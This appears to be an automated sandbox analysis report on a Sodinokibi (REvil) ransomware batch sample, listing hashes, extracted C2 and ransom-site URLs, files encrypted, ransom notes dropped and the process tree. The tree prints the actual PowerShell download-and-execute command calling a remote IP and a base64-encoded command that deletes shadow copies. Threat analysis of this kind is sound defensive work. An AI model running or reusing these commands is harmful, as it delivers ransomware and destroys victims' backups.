Analysis
max time kernel: 127s
max time network: 52s
platform: windows7_x64
resource: win7v200430
submitted: 21-05-2020 18:10
Static task: static1
Behavioral task: behavioral1
  Sample: 328013aa2b767f95491e4d8e9372cc46.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: 328013aa2b767f95491e4d8e9372cc46.bat
  Resource: win10v200430
General
Target: 328013aa2b767f95491e4d8e9372cc46.bat
Size: 219B
MD5: 8da3de41f693d26688864e6e24e5c4f0
SHA1: 229f10d9481ea1c89a085e76365149ca34ca4614
SHA256: de741f43e0b638ccbfadfc41f6e82f8fd2c5b39d4f9f38469affb4d4960487b5
SHA512: 70d2cb7f7cb47c2b9111d548b4f405ea7b5e95ced055d64e25190200487e174f36f2fe86aaa86c4778c2f6f3c8d10e05ba6a55b808437b2d180a4cee67240386
Malware Config
Extracted: http://185.103.242.78/pastes/328013aa2b767f95491e4d8e9372cc46
Extracted: C:\ow20ox3utq-readme.txt
  Family: sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F8CAEF7359F44750
  http://decryptor.cc/F8CAEF7359F44750
Signatures

Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, vssvc.exe
  description                      pid   process
  Token: SeDebugPrivilege          1068  powershell.exe
  Token: SeDebugPrivilege          1068  powershell.exe
  Token: SeDebugPrivilege          1780  powershell.exe
  Token: SeBackupPrivilege         1584  vssvc.exe
  Token: SeRestorePrivilege        1584  vssvc.exe
  Token: SeAuditPrivilege          1584  vssvc.exe
  Token: SeTakeOwnershipPrivilege  1068  powershell.exe

Blacklisted process makes network request (1 IoC)
Processes: powershell.exe
  flow  pid   process
  2     1068  powershell.exe

Drops file in Program Files directory (27 IoCs)
Processes: powershell.exe
  description                   ioc                                                                                 process
  File opened for modification  \??\c:\program files\EnableStep.iso                                                 powershell.exe
  File opened for modification  \??\c:\program files\ResumeStop.ADTS                                                powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\ow20ox3utq-readme.txt          powershell.exe
  File opened for modification  \??\c:\program files\SubmitDismount.mpp                                             powershell.exe
  File opened for modification  \??\c:\program files\InstallRegister.dib                                            powershell.exe
  File opened for modification  \??\c:\program files\MountImport.mid                                                powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\ow20ox3utq-readme.txt  powershell.exe
  File created                  \??\c:\program files\ow20ox3utq-readme.txt                                          powershell.exe
  File opened for modification  \??\c:\program files\FormatUnlock.eps                                               powershell.exe
  File opened for modification  \??\c:\program files\HidePublish.WTV                                                powershell.exe
  File opened for modification  \??\c:\program files\ResumeUse.wma                                                  powershell.exe
  File opened for modification  \??\c:\program files\SetUnprotect.rtf                                               powershell.exe
  File opened for modification  \??\c:\program files\BlockMount.vsd                                                 powershell.exe
  File opened for modification  \??\c:\program files\RevokeExpand.asx                                               powershell.exe
  File opened for modification  \??\c:\program files\AssertGroup.pot                                                powershell.exe
  File opened for modification  \??\c:\program files\FindConvertFrom.wmx                                            powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\ow20ox3utq-readme.txt               powershell.exe
  File opened for modification  \??\c:\program files\ConvertPop.mpg                                                 powershell.exe
  File opened for modification  \??\c:\program files\ProtectConvert.ADTS                                            powershell.exe
  File opened for modification  \??\c:\program files\TestRestore.dotm                                               powershell.exe
  File opened for modification  \??\c:\program files\UnprotectDisable.wmf                                           powershell.exe
  File opened for modification  \??\c:\program files\FormatSkip.emz                                                 powershell.exe
  File opened for modification  \??\c:\program files\LockClose.wmf                                                  powershell.exe
  File opened for modification  \??\c:\program files\SubmitPush.svgz                                                powershell.exe
  File created                  \??\c:\program files (x86)\ow20ox3utq-readme.txt                                    powershell.exe
  File opened for modification  \??\c:\program files\ConfirmSubmit.mpeg                                             powershell.exe
  File opened for modification  \??\c:\program files\TestCompress.jpeg                                              powershell.exe

Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
  description      ioc                                                                                                                                                                   process
  Set value (str)  \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8rn54i7917b6.bmp"  powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: powershell.exe
  pid   process
  1068  powershell.exe

Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
  description                       pid   process         target process
  PID 376 wrote to memory of 1068   376   cmd.exe         powershell.exe
  PID 1068 wrote to memory of 1780  1068  powershell.exe  powershell.exe
  PID 1068 wrote to memory of 1780  1068  powershell.exe  powershell.exe
  PID 1068 wrote to memory of 1780  1068  powershell.exe  powershell.exe
  PID 1068 wrote to memory of 1780  1068  powershell.exe  powershell.exe

Suspicious behavior: EnumeratesProcesses (77 IoCs)
Processes: powershell.exe (PID 1068), powershell.exe (PID 1780)
  pid   process
  1068  powershell.exe  (repeated hits throughout the run)
  1780  powershell.exe  (repeated hits throughout the run)

Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
  description  ioc                                                                                           process
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                           vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer      vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                      vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer                    vssvc.exe
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Enumerates connected drives (3 TTPs)
Processes

C:\Windows\system32\cmd.exe  (PID: 376)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\328013aa2b767f95491e4d8e9372cc46.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID: 1068)
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/328013aa2b767f95491e4d8e9372cc46');Invoke-AATPTEWMZPXK;Start-Sleep -s 10000"
    - Suspicious use of AdjustPrivilegeToken
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID: 1780)
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\vssvc.exe  (PID: 1584)
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service